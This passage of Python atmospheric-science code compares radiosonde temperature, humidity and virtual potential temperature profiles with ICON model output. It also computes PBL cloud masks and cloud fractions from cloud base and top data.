    over a +-1 hour window centred on the launch hour (window clipped to a
    2-hour span at the day edges, hours 0 and 23), and stored together with
    the radiosonde data in one dictionary per sounding.

    Parameters: per-day lists; profile entries are indexed [day][:, sounding],
    model fields [day][time, height], scalar series [day][time / sounding].

    Returns
    -------
    list of dict
        One element per radiosonde, all days piled together, each holding
        the radiosonde profiles, the model means/stds and the launch hour.
    """
    theta_v_dict_obs_mod_arr = []
    # time_radiosondes is a list: every element of the list corresponds to a day,
    # and for every day there is a different number of radiosondes launched.
    Ndays = len(time_radiosondes)
    # loop on the number of days: for each day there is a different number of
    # radiosondes launched (NradDay)
    for indDay in range(Ndays):
        # number of radiosondes launched that day
        NradDay = len(time_radiosondes[indDay])
        # loop on the number of radiosondes of the day
        for indRadDay in range(NradDay):
            # reading the data of the selected radiosonde of the day
            radioSondeSelected = time_radiosondes[indDay][indRadDay]
            lcl_rad = lcl_radiosondes[indDay][indRadDay]
            ccl_rad = ccl_radiosondes[indDay][indRadDay]
            lts_rad = lts_radiosondes[indDay][indRadDay]
            pblHeight_rad = pblHeight_radiosondes[indDay][indRadDay]
            # radiosonde profiles: one column per sounding
            theta_v_rad = theta_v_radiosondes[indDay][:,indRadDay]
            T_rad_day = T_radiosondes[indDay][:,indRadDay]
            rh_rad_day = rh_radiosObs[indDay][:,indRadDay]
            height_rad = height_radiosondes[indDay][:,indRadDay]
            # model fields of the whole day: (time, height)
            theta_v_day = theta_v_mod[indDay][:,:]
            T_mod_day = T_mod[indDay][:,:]
            rh_mod_day = rh_mod[indDay][:,:]
            time_day = time_mod[indDay][:]
            lcl_mod_day = lcl_mod[indDay][:]
            ccl_mod_day = ccl_mod[indDay][:]
            lts_mod_day = lts_mod[indDay][:]
            pblHeight_mod_day = pblHeight_mod[indDay][:]
            # reading exact hour of the radiosounding (datetime-like object)
            hh = radioSondeSelected.hour
            dd = radioSondeSelected.day
            yy = radioSondeSelected.year
            MM = radioSondeSelected.month
            # defining the time interval around the hour to consider for the
            # model average; clipped so it never crosses the day boundary
            if hh == 23:
                hourInf = datetime.datetime(yy,MM,dd,hh-2)
                hourSup = datetime.datetime(yy,MM,dd,hh)
            if hh == 0:
                hourInf = datetime.datetime(yy,MM,dd,hh)
                hourSup = datetime.datetime(yy,MM,dd,hh+2)
            # `*` on booleans acts as logical AND here
            if (hh!= 23) * (hh!= 0):
                hourInf = datetime.datetime(yy,MM,dd,hh-1)
                hourSup = datetime.datetime(yy,MM,dd,hh+1)
            # pandas dataframes indexed by time, to slice the [hourInf, hourSup) window
            thetaV_DF = pd.DataFrame(theta_v_day, index=time_day, columns=height_mod)
            T_mod_DF = pd.DataFrame(T_mod_day, index=time_day, columns=height_mod)
            RH_mod_DF = pd.DataFrame(rh_mod_day, index=time_day, columns=height_mod)
            lcl_mod_DF = pd.DataFrame(lcl_mod_day, index=time_day)
            ccl_mod_DF = pd.DataFrame(ccl_mod_day, index=time_day)
            lts_mod_DF = pd.DataFrame(lts_mod_day, index=time_day)
            pblHeight_mod_DF = pd.DataFrame(pblHeight_mod_day, index=time_day)
            # mean/std model profiles over the time window around the launch hour
            field_sliced_t = thetaV_DF.loc[(thetaV_DF.index < hourSup) * (thetaV_DF.index >= hourInf),:]
            theta_v_mod_mean = field_sliced_t.mean(axis=0, skipna=True)
            theta_v_mod_std = field_sliced_t.std(axis=0, skipna=True)
            field_sliced_T_mod = T_mod_DF.loc[(T_mod_DF.index < hourSup) * (T_mod_DF.index >= hourInf),:]
            T_mod_mean = field_sliced_T_mod.mean(axis=0, skipna=True)
            T_mod_std = field_sliced_T_mod.std(axis=0, skipna=True)
            field_sliced_RH_mod = RH_mod_DF.loc[(RH_mod_DF.index < hourSup) * (RH_mod_DF.index >= hourInf),:]
            RH_mod_mean = field_sliced_RH_mod.mean(axis=0, skipna=True)
            RH_mod_std = field_sliced_RH_mod.std(axis=0, skipna=True)
            # mean/std of the scalar model diagnostics over the same window
            lcl_slice = lcl_mod_DF.loc[(lcl_mod_DF.index < hourSup) * (lcl_mod_DF.index >= hourInf)]
            lcl_mod_mean = lcl_slice.mean(skipna=True)
            lcl_mod_std = lcl_slice.std(skipna=True)
            ccl_slice = ccl_mod_DF.loc[(ccl_mod_DF.index < hourSup) * (ccl_mod_DF.index >= hourInf)]
            ccl_mod_mean = ccl_slice.mean(skipna=True)
            ccl_mod_std = ccl_slice.std(skipna=True)
            lts_slice = lts_mod_DF.loc[(lts_mod_DF.index < hourSup) * (lts_mod_DF.index >= hourInf)]
            lts_mod_mean = lts_slice.mean(skipna=True)
            lts_mod_std = lts_slice.std(skipna=True)
            pblHeight_slice = pblHeight_mod_DF.loc[(pblHeight_mod_DF.index < hourSup) * (pblHeight_mod_DF.index >= hourInf)]
            pblHeight_mod_mean = pblHeight_slice.mean(skipna=True)
            pblHeight_mod_std = pblHeight_slice.std(skipna=True)
            # one dictionary per radiosonde: obs profiles + model means/stds
            dict_theta = {'theta_v_radios':theta_v_rad,
                          'T_radios':T_rad_day,
                          'RH_radios':rh_rad_day,
                          'height_rad':height_rad,
                          'theta_v_mod_mean':theta_v_mod_mean,
                          'theta_v_mod_std':theta_v_mod_std,
                          'T_mod_mean':T_mod_mean,
                          'T_mod_std':T_mod_std,
                          'RH_mod_mean':RH_mod_mean,
                          'rh_mod_std':RH_mod_std,
                          'date':radioSondeSelected,
                          'lcl_mod_mean':lcl_mod_mean,
                          'lcl_mod_std':lcl_mod_std,
                          'lcl_rad': lcl_rad,
                          'ccl_mod_mean': ccl_mod_mean,
                          'ccl_mod_std' : ccl_mod_std,
                          'ccl_rad':ccl_rad,
                          'lts_mod_mean':lts_mod_mean,
                          'lts_mod_std':lts_mod_std,
                          'lts_rad':lts_rad,
                          'pblHeight_mod_mean':pblHeight_mod_mean,
                          'pblHeight_mod_std':pblHeight_mod_std,
                          'pblHeight_rad':pblHeight_rad,
                          'hour':hh}
            theta_v_dict_obs_mod_arr.append(dict_theta)
    return(theta_v_dict_obs_mod_arr)
def f_calculateMeanProfilesPlotThetaVRadiosondes(theta_v_dict_obs_mod_arr, height_mod):
    """Derive mean profiles for each hour at which radiosondes were launched.

    The input list (one dictionary per radiosonde, as produced by
    f_calculateMeanThetaVModelProfiles) is sorted by launch hour so that
    soundings launched at the same hour on different days form contiguous
    groups. For every hour group the radiosonde profiles are collected into
    nan-padded matrices, the model mean profiles are averaged, and finally
    the radiosonde profiles are regridded and averaged onto the model
    height grid.

    Parameters
    ----------
    theta_v_dict_obs_mod_arr : list of dict
        One dictionary per radiosonde; sorted in place by 'hour'.
    height_mod : list
        height_mod[0] is the model height grid
        (assumed decreasing with index, i.e. top-down -- TODO confirm).

    Returns
    -------
    tuple
        (mean theta_v obs, std theta_v obs, listHourDict, mean T obs,
        std T obs, mean RH obs, std RH obs); each matrix has shape
        (len(height_mod[0]), number of distinct hours).

    Note
    ----
    BUGFIX: hourPrec was initialised to 0, which made the whole group of
    radiosondes launched at hour 0 (midnight) be skipped silently and left
    the k0 bookkeeping misaligned; it is now initialised to None, which can
    never match a real hour.
    """
    import operator
    from collections import Counter
    # sorting the list of dictionaries by hour, so that identical hours of
    # different days become adjacent
    theta_v_dict_obs_mod_arr.sort(key=operator.itemgetter('hour'))
    # counting how many profiles for each hour are present (on different days)
    k = [i['hour'] for i in theta_v_dict_obs_mod_arr]
    m = Counter(k)
    k0 = 0               # index of the first element of the current hour group
    listHourDict = []
    hourPrec = None      # BUGFIX: was 0, skipping the hour-0 group
    # loop on hours found
    for ind in range(len(k)):
        hourSel = k[ind]
        # process each hour only once, when it first appears in the sorted list
        if hourSel != hourPrec:
            hourPrec = hourSel
            # number of profiles available for this hour (over all days)
            Nprofiles = m[hourSel]
            lenghtProf_radios = []
            lenghtProf_mod = []
            # collect the lengths of the radiosonde and model profiles of the
            # group, to size the nan-padded matrices below
            for iloop in range(k0, k0+Nprofiles):
                lenghtProf_radios.append(len(theta_v_dict_obs_mod_arr[iloop]['theta_v_radios']))
                lenghtProf_mod.append(len(theta_v_dict_obs_mod_arr[iloop]['theta_v_mod_mean']))
            # matrices collecting all profiles of the hour, padded with nan
            MatrixProfiles_radios = np.zeros((np.max(lenghtProf_radios), Nprofiles))
            MatrixProfiles_mod = np.zeros((np.max(lenghtProf_mod), Nprofiles))
            MatrixProfiles_T_radios = np.zeros((np.max(lenghtProf_radios), Nprofiles))
            MatrixProfiles_T_mod = np.zeros((np.max(lenghtProf_mod), Nprofiles))
            MatrixProfiles_RH_radios = np.zeros((np.max(lenghtProf_radios), Nprofiles))
            MatrixProfiles_RH_mod = np.zeros((np.max(lenghtProf_mod), Nprofiles))
            MatrixHeight_radios = np.zeros((np.max(lenghtProf_radios), Nprofiles))
            arr_lcl_hour_radios = np.zeros(Nprofiles)
            arr_ccl_hour_radios = np.zeros(Nprofiles)
            arr_lts_hour_radios = np.zeros(Nprofiles)
            arr_pblHeight_hour_radios = np.zeros(Nprofiles)
            arr_lcl_hour_mod = np.zeros(Nprofiles)
            arr_ccl_hour_mod = np.zeros(Nprofiles)
            arr_lts_hour_mod = np.zeros(Nprofiles)
            arr_pblHeight_mod = np.zeros(Nprofiles)
            MatrixProfiles_radios.fill(np.nan)
            MatrixProfiles_mod.fill(np.nan)
            MatrixProfiles_RH_radios.fill(np.nan)
            MatrixProfiles_RH_mod.fill(np.nan)
            MatrixProfiles_T_radios.fill(np.nan)
            MatrixProfiles_T_mod.fill(np.nan)
            MatrixHeight_radios.fill(np.nan)
            arr_lcl_hour_radios.fill(np.nan)
            arr_ccl_hour_radios.fill(np.nan)
            arr_lts_hour_radios.fill(np.nan)
            arr_pblHeight_hour_radios.fill(np.nan)
            arr_lcl_hour_mod.fill(np.nan)
            arr_ccl_hour_mod.fill(np.nan)
            arr_lts_hour_mod.fill(np.nan)
            arr_pblHeight_mod.fill(np.nan)
            # loop on the profiles of the given hour, filling the matrices
            for iloop in range(Nprofiles):
                entry = theta_v_dict_obs_mod_arr[iloop+k0]
                # mean profiles from the model (already averaged around the hour)
                MatrixProfiles_mod[0:len(entry['theta_v_mod_mean']),iloop] = entry['theta_v_mod_mean']
                MatrixProfiles_T_mod[0:len(entry['T_mod_mean']),iloop] = entry['T_mod_mean']
                MatrixProfiles_RH_mod[0:len(entry['RH_mod_mean']),iloop] = entry['RH_mod_mean']
                # profiles from the radiosondes
                MatrixProfiles_radios[0:len(entry['theta_v_radios']),iloop] = entry['theta_v_radios']
                MatrixProfiles_T_radios[0:len(entry['T_radios']),iloop] = entry['T_radios']
                MatrixProfiles_RH_radios[0:len(entry['RH_radios']),iloop] = entry['RH_radios']
                MatrixHeight_radios[0:len(entry['height_rad']),iloop] = entry['height_rad']
                # scalar diagnostics (lcl, ccl, lts, pbl height) from the radiosondes...
                arr_lcl_hour_radios[iloop] = entry['lcl_rad']
                arr_ccl_hour_radios[iloop] = entry['ccl_rad']
                arr_lts_hour_radios[iloop] = entry['lts_rad']
                arr_pblHeight_hour_radios[iloop] = entry['pblHeight_rad']
                # ...and from the model means already calculated
                arr_lcl_hour_mod[iloop] = entry['lcl_mod_mean']
                arr_ccl_hour_mod[iloop] = entry['ccl_mod_mean']
                arr_lts_hour_mod[iloop] = entry['lts_mod_mean']
                arr_pblHeight_mod[iloop] = entry['pblHeight_mod_mean']
            # advance k0 to the first element of the next hour group
            k0 = k0+Nprofiles
            # mean/std of the model profiles collected for this hour
            meanProfile_mod = np.nanmean(MatrixProfiles_mod, axis=1)
            stdProfile_mod = np.nanstd(MatrixProfiles_mod, axis=1)
            meanProfile_T_mod = np.nanmean(MatrixProfiles_T_mod, axis=1)
            stdProfile_T_mod = np.nanstd(MatrixProfiles_T_mod, axis=1)
            meanProfile_RH_mod = np.nanmean(MatrixProfiles_RH_mod, axis=1)
            stdProfile_RH_mod = np.nanstd(MatrixProfiles_RH_mod, axis=1)
            outDict = {'hour':hourSel, \
                       'Nprofiles':Nprofiles, \
                       'MatrixProfile_radios':MatrixProfiles_radios, \
                       'MatrixProfile_T_radios':MatrixProfiles_T_radios, \
                       'MatrixProfile_RH_radios':MatrixProfiles_RH_radios, \
                       'MatrixHeight_radios':MatrixHeight_radios, \
                       'meanProfile_mod':meanProfile_mod, \
                       'stdProfileMod':stdProfile_mod, \
                       'meanProfile_T_mod':meanProfile_T_mod, \
                       'stdProfile_T_Mod':stdProfile_T_mod, \
                       'meanProfile_RH_mod':meanProfile_RH_mod, \
                       'stdProfile_RH_Mod':stdProfile_RH_mod, \
                       'lcl_rad_hour':arr_lcl_hour_radios, \
                       'lcl_mod_hour':arr_lcl_hour_mod, \
                       'ccl_rad_hour': arr_ccl_hour_radios, \
                       'ccl_mod_hour': arr_ccl_hour_mod, \
                       'lts_rad_hour':arr_lts_hour_radios, \
                       'lts_mod_hour':arr_lts_hour_mod, \
                       'pblHeight_rad_hour':arr_pblHeight_hour_radios, \
                       'pblHeight_mod_hour':arr_pblHeight_mod, \
                       'n_lts_hour':len(arr_lts_hour_mod), \
                       'n_lts_hour_obs':len(arr_lts_hour_radios), \
                       'n_lcl_hour':len(arr_lcl_hour_mod), \
                       'n_lcl_hour_obs':len(arr_lcl_hour_radios)}
            # each dictionary contains the profile matrices of one hour
            listHourDict.append(outDict)
    # regridding radiosonde mean/std profiles onto the ICON model height grid
    gridHeight = height_mod[0]
    NgridInterp = len(gridHeight)
    MatrixHourMeanProfileThetaRad = np.zeros((NgridInterp, len(listHourDict)))
    MatrixHourStdProfileThetaRad = np.zeros((NgridInterp, len(listHourDict)))
    MatrixHourMeanProfileTRad = np.zeros((NgridInterp, len(listHourDict)))
    MatrixHourStdProfileTRad = np.zeros((NgridInterp, len(listHourDict)))
    MatrixHourMeanProfileRHRad = np.zeros((NgridInterp, len(listHourDict)))
    MatrixHourStdProfileRHRad = np.zeros((NgridInterp, len(listHourDict)))
    MatrixHourMeanProfileThetaRad.fill(np.nan)
    MatrixHourStdProfileThetaRad.fill(np.nan)
    MatrixHourMeanProfileTRad.fill(np.nan)
    MatrixHourStdProfileTRad.fill(np.nan)
    MatrixHourMeanProfileRHRad.fill(np.nan)
    MatrixHourStdProfileRHRad.fill(np.nan)
    # loop on the hours: for each hour, read the matrices of height and
    # theta_v/T/RH from the radiosondes of that hour
    for indHour in range(len(listHourDict)):
        MatrixHeightHour = listHourDict[indHour]['MatrixHeight_radios']
        MatrixHourTheta = listHourDict[indHour]['MatrixProfile_radios']
        MatrixHour_T = listHourDict[indHour]['MatrixProfile_T_radios']
        MatrixHour_RH = listHourDict[indHour]['MatrixProfile_RH_radios']
        sizeMatrix = np.shape(MatrixHourTheta)
        Nradiosondes = sizeMatrix[1]
        MeanProfileTheta = np.zeros((NgridInterp, Nradiosondes))
        MeanProfileTheta.fill(np.nan)
        MeanProfileT = np.zeros((NgridInterp, Nradiosondes))
        MeanProfileT.fill(np.nan)
        MeanProfileRH = np.zeros((NgridInterp, Nradiosondes))
        MeanProfileRH.fill(np.nan)
        # for every model grid cell, average the radiosonde values whose
        # heights fall inside it; gridHeight is assumed to decrease with
        # index (model levels ordered top-down -- TODO confirm)
        for indRadiosonde in range(Nradiosondes):
            for indHeight in range(len(gridHeight)-1):
                Hmax = gridHeight[indHeight]
                Hmin = gridHeight[indHeight+1]
                indFound = np.where((MatrixHeightHour[:,indRadiosonde] >= Hmin) * \
                                    (MatrixHeightHour[:,indRadiosonde] < Hmax))
                MeanProfileTheta[indHeight,indRadiosonde] = np.nanmean(MatrixHourTheta[indFound,indRadiosonde])
                MeanProfileT[indHeight,indRadiosonde] = np.nanmean(MatrixHour_T[indFound,indRadiosonde])
                MeanProfileRH[indHeight,indRadiosonde] = np.nanmean(MatrixHour_RH[indFound,indRadiosonde])
        # mean/std over the radiosondes of the hour, on the model grid
        MatrixHourMeanProfileThetaRad[:, indHour] = np.nanmean(MeanProfileTheta, axis=1)
        MatrixHourStdProfileThetaRad[:, indHour] = np.nanstd(MeanProfileTheta, axis=1)
        MatrixHourMeanProfileTRad[:, indHour] = np.nanmean(MeanProfileT, axis=1)
        MatrixHourStdProfileTRad[:, indHour] = np.nanstd(MeanProfileT, axis=1)
        MatrixHourMeanProfileRHRad[:, indHour] = np.nanmean(MeanProfileRH, axis=1)
        MatrixHourStdProfileRHRad[:, indHour] = np.nanstd(MeanProfileRH, axis=1)
    return(MatrixHourMeanProfileThetaRad, MatrixHourStdProfileThetaRad, listHourDict, \
           MatrixHourMeanProfileTRad, MatrixHourStdProfileTRad, MatrixHourMeanProfileRHRad, \
           MatrixHourStdProfileRHRad)
def f_calPBLcloudMask(PBLcloud_dataset,time,height):
    """
    author: Claudia Acquistapace
    date : Friday 19 June 2020
    goal : build a binary cloud mask from the PBL cloud base/top time series.
    Up to 8 cloud layers per time step are assumed, i.e.
    np.shape(PBLcloud_dataset.cloudBase.values) = (len(time), 8).
    Returns a (len(time), len(height)) matrix with 1 inside clouds, 0 elsewhere.
    """
    cloud_base = PBLcloud_dataset.cloudBase.values
    cloud_top = PBLcloud_dataset.cloudTop.values
    mask = np.zeros((len(time), len(height)))
    for i_time in range(len(time)):
        for i_lev in range(8):
            base = cloud_base[i_time, i_lev]
            # a nan cloud base means no cloud layer at this slot
            if np.isnan(base):
                continue
            top = cloud_top[i_time, i_lev]
            # flag every height bin lying between cloud base and cloud top
            in_cloud = (height >= base) * (height <= top)
            mask[i_time, in_cloud] = 1
    return(mask)
def f_calculateCloudFractionPBLclouds(PBLcloudmask,time,height,Nmin_string):
    '''
    author: Claudia Acquistapace
    date: friday 19 June 2020
    goal: derive the cloud fraction from a binary cloud mask by binning the
          time axis into intervals of Nmin_string minutes.
    input: PBLcloudmask: cloud mask matrix (time, height)
           time: time array corresponding to the cloud mask
           height: height array corresponding to the cloud mask
           Nmin_string: bin width in minutes, as a string
    output: xr.Dataset with variable 'CF' of shape (time, height), where
            time holds the bin edges returned by pd.date_range.
    '''
    mask_df = pd.DataFrame(PBLcloudmask, index=time, columns=height)
    # bin edges every Nmin_string minutes, converted to python datetimes
    bin_edges = pd.date_range(start=time[0], end=time[-1], freq=Nmin_string+'min')
    bin_edges = bin_edges.to_pydatetime()
    cloud_fraction = np.zeros((len(bin_edges), len(height)))
    # note: the last row stays zero, as the loop runs over N-1 intervals
    for i_bin in range(len(bin_edges)-1):
        in_bin = (mask_df.index > bin_edges[i_bin]) * (mask_df.index < bin_edges[i_bin+1])
        bin_rows = mask_df[in_bin]
        for i_h in range(len(height)):
            column = bin_rows.loc[:, bin_rows.columns[i_h]]
            # fraction of cloudy samples within the time bin at this height
            cloud_fraction[i_bin, i_h] = len(column[column == 1])/len(column)
    return xr.Dataset({'CF': (['time','height'], cloud_fraction)},
                      coords = {'time':bin_edges,
                                'height':height})
{
"api_name": "datetime.datetime",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "datetime.dateti... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.